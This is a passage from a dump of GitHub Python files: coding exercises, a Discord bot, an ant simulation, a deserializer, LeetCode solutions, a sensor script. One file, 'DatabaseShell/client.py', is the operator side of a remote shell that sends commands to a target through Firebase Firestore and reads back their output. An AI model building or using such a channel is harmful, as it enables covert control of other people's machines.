1\n print(\"{:d}\".format(my_list[i]), end=\"\")\n except (TypeError, ValueError):\n index -= 1\n print(\"\")\n try:\n return (index)\n except NameError:\n return (0)\n","repo_name":"shady-cj/alx-higher_level_programming","sub_path":"0x05-python-exceptions/2-safe_print_list_integers.py","file_name":"2-safe_print_list_integers.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3937542184","text":"def fun1(n):\n return n ** 2\n\nfun2 = lambda n: n ** 2\n\n\nnum = 10\nprint(fun1(num))\nprint(fun2(num))\n\n\nlst = [1, 2, 3, 4, 5, 6, 7]\nout = map(lambda x: x**2+10, lst)\nprint(list(out))\n\nfil = filter(lambda x: x % 2, lst)\nprint(list(fil))","repo_name":"pymft/mft-01","sub_path":"S07/lambda_function/lambda_function_intro.py","file_name":"lambda_function_intro.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"13059057739","text":"import os\nimport logging\nimport hikari\nimport lightbulb\n\nfrom peach_bot import peach_bot\n\ndef create_bot() -> lightbulb.BotApp:\n bot = lightbulb.BotApp(\n token=os.environ[\"TOKEN\"],\n prefix=\"!\",\n intents=hikari.Intents.ALL,\n default_enabled_guilds=int(os.environ[\"TEST_GUILD_ID\"]),\n help_slash_command=True,\n logs=\"INFO\"\n ) \n\n bot.load_extensions_from(\"./peach_bot/commands\")\n\n return bot\n\nif __name__ == \"__main__\":\n if os.name != \"nt\":\n import uvloop\n uvloop.install()\n \n create_bot().run()","repo_name":"anthony-nagtalon/hikari_peach_bot","sub_path":"peach_bot/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36150445518","text":"\"\"\" Logic for the ant objects \"\"\"\n\nimport random\nimport math\nimport utilities as ut\n\n\nclass Ant:\n def __init__(self, config, sim_args, nest_position):\n self.position = nest_position\n self.size = config['graphics']['ant']['radius']\n self.speed = config['ant']['stepsize']\n\n self.initial_energy = config['ant']['ini_energy']\n self.energy = config['ant']['ini_energy']\n\n self.is_carrying_food = False\n\n # Calculate a random distance between 0 and stepsize\n distance = random.uniform(0, self.speed)\n\n # Calculate the angle (in radians) for the new position\n angle = random.uniform(0, 2 * math.pi)\n\n # Calculate the new x and y positions\n self.position['x'] = nest_position['x'] + distance * math.cos(angle)\n self.position['y'] = nest_position['y'] + distance * math.sin(angle)\n\n # Movement\n self.direction = random.uniform(0, 2 * math.pi)\n\n def update(self, colony):\n if self.is_dead():\n return False\n\n # Decision making\n if not self.is_carrying_food and colony.is_food_near(self.position, self.size):\n self.is_carrying_food = True\n self.direction = math.atan2(colony.nest_position['y'] - self.position['y'],\n colony.nest_position['x'] - self.position['x'])\n elif self.is_carrying_food and ut.CalculateDistance(self.position, colony.nest_position) <= self.size:\n self.is_carrying_food = False\n self.direction = random.uniform(0, 2 * math.pi)\n\n if not self.is_carrying_food:\n pheromone = colony.get_closest_pheromone(self.position)\n if pheromone:\n self.direction = math.atan2(pheromone['y'] - self.position['y'],\n pheromone['x'] - self.position['x'])\n\n # Movement\n self.move()\n\n # Decrease energy\n self.energy -= 1\n\n # Lay pheromone\n # if self.is_carrying_food:\n # colony.add_pheromone(self.position)\n\n def is_dead(self):\n return self.energy <= 0\n\n def move(self):\n dx = self.speed * math.cos(self.direction)\n dy = self.speed * math.sin(self.direction)\n\n self.position['x'] += dx\n self.position['y'] += dy\n","repo_name":"mahoskye/colony-ant-simulator","sub_path":"colony-ant-simulator/ant.py","file_name":"ant.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"20003338632","text":"import collections\nfrom enum import Enum\nimport inspect\n\n__author__ = 'yoav.luft@ajillionmax.com'\n\n\nclass DictDeserializer(object):\n \"\"\"\n DictDeserializer is an object that given a callable that construct an object and a dictionary of mapping rules will\n convert dictionary into the object constructed by the function.\n\n The mapping rules define how the raw dictionary values should be passed to the creating function. Each key in the\n mapping rules will be matched to a key in the raw data and the rule's value will be used for mapping according to:\n\n * If rule is integer, the raw data value will be passed as a positional argument in the rule as ordering.\n * If rule is a string, the raw data value will be used as keyword argument with the rule as a key.\n * If rule is a callable it will be invoked with (key, raw[key]) and should return a (keyword, value) tuple that\n will be passed as a keyword argument.\n\n Examples::\n\n # Calls `Thing('something')`\n DictDeserializer(Thing, {'argument': 0}).\n create_from({'argument': 'something'})\n\n # Calls `Thing(key1='something')`\n DictDeserializer(Thing, {'arg': 'key1'}).\n create_from({'arg': 'something'})\n\n another_deserializer = DictDeserializer(AnotherThing, {...})\n thing_deserializer = DictDeserializer(Thing,\n {'arg': lambda k, v: ('another', another_deserializer.create_from(v))})\n # Calls `Thing(another=another_deserializer.create_from({'a': 1, 'b': 2}))`\n thing_deserializer.create_from({'arg': {'a': 1, 'b': 2}})\n\n \"\"\"\n\n class UnmappedBehaviour(Enum):\n \"\"\"\n Defines how the deserializer should handle input dictionary fields without mapping rules.\n IGNORE: just ignore them. Default behaviour.\n TO_KWARGS: Pass them to creating function without any mapping.\n FAIL: Fail and raise DeserializerError\n \"\"\"\n IGNORE = 0\n TO_KWARGS = 1\n FAIL = 2\n\n class DeserializerError(TypeError):\n pass\n\n def __init__(self, creator, mapping_rules=None, **kwargs):\n \"\"\"\n Instantiate new deserializer that will use the creator callable and the mapping rules to create new objects.\n :param creator: A callable that will be used for creating new objects. Usually the class itself.\n :param mapping_rules: A dictionary of raw data keys and rules to how they should be used when calling the\n creator callable\n :param unmapped_behaviour:\n :return:\n \"\"\"\n if not mapping_rules:\n mapping_rules = {}\n if not (inspect.isclass(creator) or inspect.isfunction(creator)):\n raise TypeError(\"creator must be a callable or class\")\n self.target_class = creator\n self.rules = mapping_rules\n self.unmapped_behaviour = kwargs.pop('unmapped_behaviour', DictDeserializer.UnmappedBehaviour.IGNORE)\n\n def _map_value(self, key, raw):\n rule = self.rules[key]\n keyword = value = index = None\n if callable(rule):\n keyword, value = rule(key, raw[key])\n elif isinstance(rule, str):\n keyword, value = rule, raw[key]\n elif isinstance(rule, int):\n index, value = rule, raw[key]\n return index, keyword, value\n\n def _map_arguments(self, raw):\n arguments = []\n keywords = {}\n raw_keys_set = set(raw.keys())\n rules_keys_set = set(self.rules.keys())\n unmapped = self._handle_unmapped_values(rules_keys_set, raw_keys_set, raw)\n for key in raw_keys_set.intersection(rules_keys_set):\n index, keyword, value = self._map_value(key, raw)\n if index is not None:\n arguments.insert(index, value)\n else:\n keywords[keyword] = value\n keywords.update(unmapped)\n return arguments, keywords\n\n def _handle_unmapped_values(self, rules_set, raw_set, raw_data):\n if self.unmapped_behaviour == DictDeserializer.UnmappedBehaviour.IGNORE:\n return {}\n unmapped_keys = raw_set - rules_set\n if self.unmapped_behaviour == DictDeserializer.UnmappedBehaviour.FAIL and len(unmapped_keys) > 0:\n raise DictDeserializer.DeserializerError(\"The following keys do no have mapping rules: %s\"\n % str(unmapped_keys))\n return {k: raw_data[k] for k in unmapped_keys}\n\n def create_from(self, raw: dict) -> 'object':\n if not isinstance(raw, dict):\n raise DictDeserializer.DeserializerError(\"Deserialized object must be a dictionary object\")\n arguments, keywords = self._map_arguments(raw)\n try:\n return self.target_class(*arguments, **keywords)\n except (AttributeError, TypeError) as e:\n raise DictDeserializer.DeserializerError(\"Failed to create object\") from e\n\n\nclass IterableDictDeserializer(DictDeserializer):\n \"\"\"\n The same as :class:`DictDeserializer` only that it accepts an iterable and return an iterable of deserialized objects\n \"\"\"\n def __init__(self, creator, mapping_rules=None, **kwargs):\n super(IterableDictDeserializer, self).__init__(creator, mapping_rules, **kwargs)\n\n def create_from(self, raw: collections.Iterable) -> collections.Iterable:\n return map(super(IterableDictDeserializer, self).create_from, raw)\n\n","repo_name":"ajillion-by-crossrider/ajillion-rpc-client","sub_path":"rpcclient/deserialize.py","file_name":"deserialize.py","file_ext":"py","file_size_in_byte":5408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7834074530","text":"# 234. Palindrome Linked List Add to List\n# DescriptionSubmissionsSolutions\n# Total Accepted: 91931\n# Total Submissions: 287815\n# Difficulty: Easy\n# Contributors: Admin\n# Given a singly linked list, determine if it is a palindrome.\n# \n# Follow up:\n# Could you do it in O(n) time and O(1) space?\n\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\n\n# 2018.03.10\nclass Solution(object):\n def isPalindrome(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: bool\n \"\"\"\n res = []\n cur = head\n while cur:\n res.append(cur.val)\n cur = cur.next\n \n i, j = 0, len(res) - 1\n while i < j and res[i] == res[j]:\n i, j = i + 1, j - 1\n return False if i < j else True\n\n\n# 2017.03.25 Better way\nclass Solution(object):\n def isPalindrome(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: bool\n \"\"\"\n if not head or not head.next: return True\n rev = None\n slow = fast = head\n while fast and fast.next:\n fast = fast.next.next\n rev, rev.next, slow = slow, rev, slow.next\n if fast:\n slow = slow.next\n while rev and rev.val == slow.val:\n rev, slow = rev.next, slow.next\n return not rev\n\nclass Solution(object):\n def isPalindrome(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: bool\n \"\"\"\n if not head or not head.next: return True\n \n slow, fast = head, head.next\n while fast and fast.next:\n slow, fast = slow.next, fast.next.next\n \n l2 = self.reverseList(slow.next)\n\n cur1, cur2 = head, l2\n while cur2:\n if cur1.val != cur2.val:\n return False\n \n cur1, cur2 = cur1.next, cur2.next\n return True\n \n def reverseList(self, head):\n if not head or not head.next: return head\n \n dummy = ListNode(-1)\n dummy.next = head\n pre = dummy\n cur = pre.next\n post = cur.next\n \n while post:\n cur.next = post.next\n post.next = pre.next\n pre.next = post\n post = cur.next\n \n return dummy.next\n","repo_name":"yihanc/LC","sub_path":"PY/234_palindrome_linked_list.py","file_name":"234_palindrome_linked_list.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25701554708","text":"import os\nfrom pprint import pprint\nimport requests\n\n\nclass DataManager:\n def __init__(self):\n self.url = os.environ['SHEETY_ENDPOINT']\n self.header = {\n \"Authorization\": f\"Bearer {os.environ['TOKEN']}\"\n }\n\n def get_data(self):\n return requests.get(url=self.url, headers=self.header).json()[\"prices\"]\n\n def update_sheet(self, sheet_data):\n for line in sheet_data:\n request_body = {\n \"price\": {\n \"iataCode\": line[\"iataCode\"]\n }\n }\n response = requests.put(url=f\"{self.url}/{line['id']}\", headers=self.header, json=request_body).text\n pprint(response)\n\n","repo_name":"ZergDefense/Day39-Flight_deal_finder","sub_path":"data_manager.py","file_name":"data_manager.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24360062631","text":"inp1,inp2=input().split()\ntempp=0\nif len(inp1)>len(inp2):\n inp1,inp2=inp2,inp1\ni=0\nwhile icurr_winner[1]:\r\n curr_winner = winner[:]\r\n else:\r\n curr_winner = winner[:]\r\n return curr_winner[0]","repo_name":"aivandes/algoexpert_solutions","sub_path":"Tournament_winner.py","file_name":"Tournament_winner.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70909094829","text":"import logging\nimport numpy as np\nimport os\nimport sys\n\nfrom gtts import gTTS\nfrom playsound import playsound\n\nfrom cluefinder.ClueFinder import ClueFinder\nfrom cluefinder.ApproximationClueFinder import ApproximationClueFinder\nfrom gamecomponents.ComponentReader import ComponentReader\nfrom gamecomponents.Card import Card, Team\nfrom globalvariables import GRID_SIZE\nfrom iomanager.CodenamesGUI import CodenamesGUI\n\n\"\"\"\nTODO:\n - Have cardGrid be its own class to iterate over cards and maintain game state (team)\n \n - Impose a hierarchy of avoidance to negative words (assassin < other team < neutral)\n - Implement \"related words\" strategy\n - Pre-compute distances between words\n - Pre-compute nearest neighbors?\n\"\"\"\n\nGrid = np.array\nImage = np.array\n\n\ndef printUsage(arg: str):\n print(\"Invalid option: \" + arg + \" \\n\" +\n \"Usage: python run.py [options] \\n\" +\n \"Options: \\n\" +\n \" -noPi Don't run Raspberry Pi code for capturing images and dictating clues \\n\" +\n \" -keycard Location of an existing image of the key card \\n\" +\n \" -wordgrid Location of an existing image of the grid of words \\n\" +\n \" -loadInitialState Location of the object from saveInitialState (bypass all image processing)\\n\" +\n \" -saveInitialState Location to save the game's initial state object \")\n quit(-1)\n\n\ndef stringifyCardgrid(cellString) -> str:\n output: str = \"\"\n for row in range(GRID_SIZE):\n for col in range(GRID_SIZE):\n output += \"[{:^20}]\".format(cellString(row, col))\n output += \"\\n\"\n return output\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(filename=\"codenames.log\", filemode=\"w\", format=\"%(message)s\", level=logging.INFO)\n\n # COMMAND LINE ARGUMENTS\n usePi: bool = True\n keycard: str = \"\"\n wordgrid: str = \"\"\n loadInitialState: str = \"\"\n saveInitialState: str = \"\"\n\n i: int = 0\n while i + 1 < len(sys.argv):\n i = i + 1\n arg = sys.argv[i]\n if arg == \"-noPi\":\n usePi = False\n elif arg == \"-keycard\" and i + 1 < len(sys.argv):\n i = i + 1\n keycard = sys.argv[i]\n elif arg == \"-wordgrid\" and i + 1 < len(sys.argv):\n i = i + 1\n wordgrid = sys.argv[i]\n elif arg == \"-loadInitialState\" and i + 1 < len(sys.argv):\n i = i + 1\n loadInitialState = sys.argv[i]\n elif arg == \"-saveInitialState\" and i + 1 < len(sys.argv):\n i = i + 1\n saveInitialState = sys.argv[i]\n else:\n printUsage(arg)\n\n # SETUP\n gui: CodenamesGUI = CodenamesGUI()\n reader: ComponentReader = ComponentReader()\n clueFinder: ClueFinder = ApproximationClueFinder(vocabularySize=32768)\n cardGrid: Grid = Grid([[Card() for col in range(GRID_SIZE)] for row in range(GRID_SIZE)], dtype=Card)\n\n if loadInitialState != \"\":\n cardGrid = np.load(loadInitialState, allow_pickle=True)\n else:\n if usePi and keycard == \"\":\n keycard = gui.captureKeycard()\n reader.readKeycard(keycard, cardGrid)\n if usePi and wordgrid == \"\":\n wordgrid = gui.captureWordgrid()\n reader.readWordgrid(wordgrid, cardGrid)\n\n team: Team = gui.verifyKeycard(cardGrid)\n logging.info(\"=========================\\n======== KEYCARD ========\\n=========================\")\n logging.info(stringifyCardgrid(lambda row, col: str(cardGrid[row, col].team)))\n\n # MAIN GAME LOOP\n roundNumber: int = 0\n gameOver: bool = False\n while not gameOver:\n roundNumber = roundNumber + 1\n logging.info(\n \"=========================\\n======== ROUND \" + str(roundNumber) + \" ========\\n=========================\")\n\n risk: int = gui.verifyWordgrid(cardGrid)\n while not clueFinder.checkVocabulary(cardGrid):\n risk = gui.verifyWordgrid(cardGrid)\n\n logging.info(stringifyCardgrid(lambda row, col: str(cardGrid[row, col].text)))\n if saveInitialState != \"\":\n np.save(saveInitialState, cardGrid, allow_pickle=True)\n saveInitialState = \"\"\n\n clue: str = clueFinder.getClue(cardGrid, team, risk)\n\n clueAudio: gTTS = gTTS(text=clue, lang=\"en\")\n clueAudio.save(\"clue.mp3\")\n if usePi:\n os.system(\"mpg321 clue.mp3\")\n else:\n playsound(\"clue.mp3\")\n gameOver = gui.displayClueAndWait(clue)\n","repo_name":"kyledpierson/codenames-spymaster","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":4789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30334896789","text":"import subprocess\r\nimport time\r\nimport firebase_admin\r\nfrom firebase_admin import credentials\r\nfrom firebase_admin import firestore\r\n\r\n\r\nclass Attacker:\r\n def __init__(self):\r\n self.cred = credentials.Certificate(\"serviceAccountKey.json\")\r\n firebase_admin.initialize_app(self.cred)\r\n self.db = firestore.client()\r\n\r\n def sendData(self):\r\n cmd = input(\"(Cible):> \")\r\n self.db.collection(\"cible\").document(\r\n \"command\").set({\"request\": f\"{cmd}\"})\r\n\r\n def recvData(self):\r\n cmd = self.db.collection(\"target\").document(\r\n \"result\").get()\r\n result = cmd.to_dict()\r\n return f\"{result['response']}\"\r\n\r\n def main(self):\r\n print(self.recvData())\r\n self.sendData()\r\n time.sleep(5)\r\n self.main()\r\n\r\n\r\nAttacker().main()\r\n# if msg[:2] == 'cd':\r\n# os.chdir(msg[3:])\r\n# self.send_msg(\"[REVERSE SHELL] * Changed Dir *\")\r\n# elif msg[:4] == 'exit':\r\n# self.fire_init()\r\n# else:\r\n# self.send_msg(result)\r\n","repo_name":"sam31403/clientserver","sub_path":"ClientServer/DatabaseShell/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22150994119","text":"import json\r\nimport discord\r\nimport os\r\nimport platform\r\nimport sys\r\nimport sysconfig\r\nimport psutil\r\nimport cpuinfo\r\n\r\n# https://stackoverflow.com/questions/276052/how-to-get-current-cpu-and-ram-usage-in-python\r\n\r\nfrom discord.ext import commands\r\n\r\nclass System(commands.Cog):\r\n\tdef __init__(self, bot, settings):\r\n\t\tself.bot = bot\r\n\t\tself.settings = settings\r\n\r\n\t@commands.command()\r\n\tasync def systeminfo(self, ctx):\r\n\t\t\"\"\"Displays the systems information\"\"\"\r\n\r\n\t\tres = f\"[OS Type][{sys.platform}]\"\r\n\t\tinfo = cpuinfo.get_cpu_info()\r\n\t\tres += f\"\\n[CPU][{psutil.cpu_count(logical=False)} Cores / {psutil.cpu_count()} Threads]\"\r\n\t\tres += f\"\\n[CPU Usage][%{str(psutil.cpu_percent())}]\"\r\n\t\tvmem = psutil.virtual_memory()\r\n\t\tres += f\"\\n[Memory][Total Memory: {int(vmem[0]/2**30)}GB Used: {int(vmem[0]/2**30)-int(vmem[1]/2**30)}GB(%{vmem[2]}) Available: {int(vmem[1]/2**30)}GB]\"\r\n\t\tif str(sys.platform) == 'linux': # Check Windows\r\n\t\t\tsmem = psutil.swap_memory()\r\n\t\t\tres += f\"\\n[Swap Memory][Total Swap Memory: {int(smem[0]/2**30)}GB Used: {int(smem[2]/2**30)}GB(%{smem[3]}) Available: {int(smem[2]/2**30)}GB]\"\r\n\t\t\r\n\t\tres += f\"\\n[Python Version][{sysconfig.get_python_version()}]\"\r\n\r\n\t\tINFO = f\"**{self.bot.user.name}**'s System Hardware:\\n```md\\n{res}\\n```\"\r\n\t\t\r\n\t\tif ctx.author.top_role.colour:\r\n\t\t\tcol = ctx.author.top_role.colour\r\n\t\telse:\r\n\t\t\tcol =self.settings.randomColor()\r\n\r\n\t\tembed = discord.Embed(\r\n\t\t\tdescription = INFO,\r\n\t\t\tcolour = col\r\n\t\t)\r\n\t\tawait ctx.send(embed=embed)\r\n\t\t\r\ndef setup(bot):\r\n\tsettings = bot.get_cog(\"Settings\")\r\n\tbot.add_cog(System(bot, settings))","repo_name":"ScoobyChan/ScrappyBot","sub_path":"Cogs/System.py","file_name":"System.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25127723971","text":"#! /usr/bin/env python3\n\n\"\"\"\nBuilds a list of cycles one edge at a time then reports the size of cycles\n\nWhen adding edge, a dictionary lookup gives a representative vertex for the path containing each end\n1. If both endpoints are included in existing paths, combine the two into one path\n2. If only one endpoint is in an existing path, add it to that path\n3. If neither endpoint is included in an existing path, add the edge as a new path\n\nSince the graph is 2-regular, there are an equal number of edges as vertices\nThe step for each edge takes O(1) time (assuming an idealized dictionary lookup) so the total time is O(n)\nThis can be sped up by short circuiting on the first completed cycle - this is still O(n) but probabilistically faster\nThis technique is sufficiently fast, but uses O(n) memory which is insufficient for large graphs\n\"\"\"\n\nfrom collections import deque\nfrom sys import stdin, stderr\n\nDEFAULT_NPAIRS = 100000\nDEFAULT_O = 3\n\ndef read_input(f=stdin):\n for line in f:\n line = line.strip()\n if not line: continue\n split = line.split()\n assert len(split) == 2\n yield split[0], split[-1]\n\ndef path_len(path, O):\n if O >= 2:\n return path[0]\n else:\n return len(path)\n\ndef append(path, i, j, O):\n \"\"\"Connect edge {i,j} to a path which has i as an endpoint\"\"\"\n if O >= 2:\n path[0] += 1\n path[1] ^= {i, j} # Replace i with j\n assert len(path[1]) == 2 # Ensure the set didn't change\n else:\n if path[0] == i:\n path.appendleft(j)\n elif path[-1] == i:\n path.append(j)\n else:\n assert False, \"%s is not an endpoint of path %s\" % (i, path)\n\ndef connect(endpoint_reprs, paths, repr_i, repr_j, i, j, O):\n path_i = paths[repr_i]\n path_j = paths[repr_j]\n\n if len(path_i) < len(path_j):\n return connect(endpoint_reprs, paths, repr_j, repr_i, j, i, O) # Make sure we leave the longer list in place\n\n del endpoint_reprs[i]\n del endpoint_reprs[j]\n del paths[repr_j]\n\n if O >= 2:\n path_i[0] += path_j[0]\n path_i[1] -= {i}\n path_i[1] |= path_j[1] - {j}\n endpoint_reprs[next(iter(path_j[1] - {j}))] = repr_i\n assert len(path_i[1]) == 2\n else:\n if path_i[0] == i and path_j[0] == j:\n path_i.extendleft(path_j)\n endpoint_reprs[path_j[-1]] = repr_i\n elif path_i[0] == i and path_j[-1] == j:\n path_i.extendleft(reversed(path_j))\n endpoint_reprs[path_j[0]] = repr_i\n elif path_i[-1] == i and path_j[0] == j:\n path_i.extend(path_j)\n endpoint_reprs[path_j[-1]] = repr_i\n elif path_i[-1] == i and path_j[-1] == j:\n path_i.extend(reversed(path_j))\n endpoint_reprs[path_j[0]] = repr_i\n else:\n assert False, \"%s and %s are not both endpoints of path %s\" % (i, j, path)\n\ndef new_path(i, j, O):\n if O >= 2:\n return [2, {i, j}] # Keep track of length and endpoints rather than the whole path\n else:\n return deque([i,j]) # Keep the whole list as a deque\n\ndef run_solution(f=stdin, O=DEFAULT_O, npairs=DEFAULT_NPAIRS):\n \"\"\"\n Reads file from stdin and outputs the cycle size\n Optimization levels:\n 0. Naive: builds full graph then checks that all are the same and outputs the size\n 1. Short circuits when a full circuit is completed or a path gets longer than min(k,l)\n 2. Does not build build full graphs but rather keeps only endpoints (default)\n 3. Keeps a fixed number of paths in memory at a time (success not guaranteed but probable)\n \"\"\"\n n, k, l = (int(x) for x in next(f).strip().split())\n if k > l: k, l = l, k # Make sure k <= l\n\n paths = {} # representative name -> deque of names\n endpoint_reprs = {} # name -> representative of group\n\n for i, j in read_input(f):\n repr_i = endpoint_reprs.get(i, None)\n repr_j = endpoint_reprs.get(j, None)\n\n if repr_i is not None and repr_j is not None:\n # Connect the two endpoint_reprs and merge paths\n if repr_i == repr_j:\n # Complete cycle\n del endpoint_reprs[i]\n del endpoint_reprs[j]\n\n if O >= 1:\n return path_len(paths[repr_i], O)\n else:\n connect(endpoint_reprs, paths, repr_i, repr_j, i, j, O)\n elif repr_i is not None:\n # Append {i,j} to the path containing i\n path = paths[repr_i]\n append(path, i, j, O)\n del endpoint_reprs[i]\n endpoint_reprs[j] = repr_i\n if O >= 1 and path_len(path, O) > k:\n return l\n elif repr_j is not None:\n # Append {i,j} to the path containing j\n path = paths[repr_j]\n append(path, j, i, O)\n del endpoint_reprs[j]\n endpoint_reprs[i] = repr_j\n if O >= 1 and path_len(path, O) > k:\n return l\n else:\n # Neither endpoint has been seen yet so make a new path\n if O < 3 or len(paths) < npairs:\n paths[i] = new_path(i, j, O) # Set i as the new path representative\n endpoint_reprs[i] = endpoint_reprs[j] = i # Link both endpoint_reprs to representative i\n\n if O >= 3:\n print(\"ERROR: no solution found\", file=stderr)\n return k # Guess k\n else:\n cycle_size = len(next(iter(paths.values())))\n assert all(len(path) == cycle_size for path in paths.values())\n\n return cycle_size\n\ndef main(f=stdin, O=DEFAULT_O, npairs=DEFAULT_NPAIRS):\n print(run_solution(f=f, O=O, npairs=npairs))\n\nif __name__ == \"__main__\":\n import argparse\n argp = argparse.ArgumentParser(\"Determines size of cycles within a graph of either all k-cycles or all l-cycles\")\n argp.add_argument(\"-O\", default=DEFAULT_O, type=int, help=\"Optimization level (default: 2)\")\n argp.add_argument(\"--pairs\", default=DEFAULT_NPAIRS, type=int, help=\"Number of pairs to keep for -O3\")\n argv = argp.parse_args()\n main(O=argv.O, npairs=argv.pairs)\n","repo_name":"justinba1010/USCCodeathon-S21-Upper","sub_path":"gotta-be-faster-than-that/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":5629,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"36978949376","text":"import time\nimport RPi.GPIO as GPIO\nimport Adafruit_GPIO.SPI as SPI\nimport Adafruit_MCP3008\nimport Adafruit_SSD1306\nimport Adafruit_DHT\n\nfrom PIL import Image\nfrom PIL import ImageDraw\nfrom PIL import ImageFont\n\nSDI = 17\nRCLK = 18\nSRCLK = 27\nRST = 24\nPIN_BUTTON_14 = 14\nPIN_BUTTON_15 = 15\nPIN_BUTTON_4 = 4\nPIN_DHT11=22\n\n# Hardware SPI configuration:\nSPI_PORT = 0\nSPI_DEVICE = 0\nmcp = Adafruit_MCP3008.MCP3008(spi=SPI.SpiDev(SPI_PORT, SPI_DEVICE))\ntempSensor = Adafruit_DHT.DHT11\n\ndispLeft = None\ndispRight = None\nbuttonState14 = False\nbuttonState15 = False\nbuttonState4 = False\nfont = ImageFont.load_default()\n\ndef setup():\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(SDI, GPIO.OUT)\n GPIO.setup(RCLK, GPIO.OUT)\n GPIO.setup(SRCLK, GPIO.OUT)\n GPIO.output(SDI, GPIO.LOW)\n GPIO.output(RCLK, GPIO.LOW)\n GPIO.output(SRCLK, GPIO.LOW)\n GPIO.setup(PIN_BUTTON_14, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n GPIO.setup(PIN_BUTTON_15, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n GPIO.setup(PIN_BUTTON_4, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n GPIO.add_event_detect(PIN_BUTTON_15, GPIO.RISING, callback=button_callback)\n GPIO.add_event_detect(PIN_BUTTON_14, GPIO.RISING, callback=button_callback)\n GPIO.add_event_detect(PIN_BUTTON_4, GPIO.RISING, callback=button_callback)\n hc595_in(0)\n global dispLeft\n dispLeft = Adafruit_SSD1306.SSD1306_128_64(rst=RST, i2c_address=0x3D)\n dispLeft.begin()\n dispLeft.clear()\n dispLeft.display()\n global dispRight\n dispRight = Adafruit_SSD1306.SSD1306_128_64(rst=RST, i2c_address=0x3C)\n dispRight.begin()\n dispRight.clear()\n dispRight.display()\n\ndef hc595_in(dat):\n #print dat\n\tfor bit in range(0, 20):\n val = 524288 & (dat << bit)\n #print val\n GPIO.output(SDI, val)\n GPIO.output(SRCLK, GPIO.HIGH)\n time.sleep(0.001)\n GPIO.output(SRCLK, GPIO.LOW)\n\thc595_out()\n\ndef hc595_out():\n\tGPIO.output(RCLK, GPIO.HIGH)\n\ttime.sleep(0.001)\n\tGPIO.output(RCLK, GPIO.LOW)\n\t\ndef button_callback(channel):\n print(channel)\n if channel == 15:\n global buttonState15\n buttonState15 = not buttonState15\n if buttonState15:\n measurePPM()\n else:\n dispLeft.clear()\n dispLeft.display()\n elif channel == 14:\n global buttonState14\n buttonState14 = not buttonState14\n if buttonState14:\n activateBar()\n else:\n hc595_in(0)\n elif channel == 4:\n global buttonState4\n buttonState4 = not buttonState4\n if buttonState4:\n measureTemp()\n else:\n dispRight.clear()\n dispRight.display()\n time.sleep(1)\n \ndef activateBar():\n values = [0]*2\n for i in range(2):\n values[i] = min(int(round(mcp.read_adc(i) / 100)),10)\n output = int(values [0] * '1' + (10 - values[0]) * '0' + values [1] * '1' + (10 - values[1]) * '0', 2)\n hc595_in(output) \n\ndef displayLeft(leftPPM, rightPPM):\n width = dispLeft.width\n height = dispLeft.height\n image = Image.new('1', (width, height))\n draw = ImageDraw.Draw(image)\n draw.text((2, 2), leftPPM, font=font, fill=255)\n draw.text((2, 2+20), rightPPM, font=font, fill=255)\n dispLeft.image(image)\n dispLeft.display()\n \ndef measureTemp():\n humidity, temperature = Adafruit_DHT.read_retry(tempSensor, PIN_DHT11)\n if humidity is not None and temperature is not None:\n displayRight('Temp={0:0.1f}*C'.format(temperature), 'Humidity={0:0.1f}%'.format(humidity))\n else:\n measureTemp()\n \ndef measurePPM():\n values = [0]*2\n for i in range(2):\n values[i] = mcp.read_adc(i)\n if values[0] is not None and values[1] is not None:\n displayLeft('PPM_1={0:0.1f} PPM'.format(values[0]), 'PPM_2={0:0.1f} PPM'.format(values[1]))\n else:\n measurePPM()\n\ndef displayRight(temp, humidity):\n width = dispRight.width\n height = dispRight.height\n image = Image.new('1', (width, height))\n draw = ImageDraw.Draw(image)\n draw.text((2, 2), temp, font=font, fill=255)\n draw.text((2, 2+20), humidity, font=font, fill=255)\n dispRight.image(image)\n dispRight.display()\n \ndef measureSoil():\n print(\"Soil \" +str(mcp.read_adc(2)))\n\nprint('Program is running, press Ctrl-C to quit...')\n\n# Main program loop.\ndef loop():\n while True:\n measureSoil()\n time.sleep(1)\n \ndef destroy():\n GPIO.cleanup()\n\nif __name__ == '__main__': # Program starting from here \n\tsetup() \n\ttry:\n loop()\n\texcept KeyboardInterrupt: \n destroy() 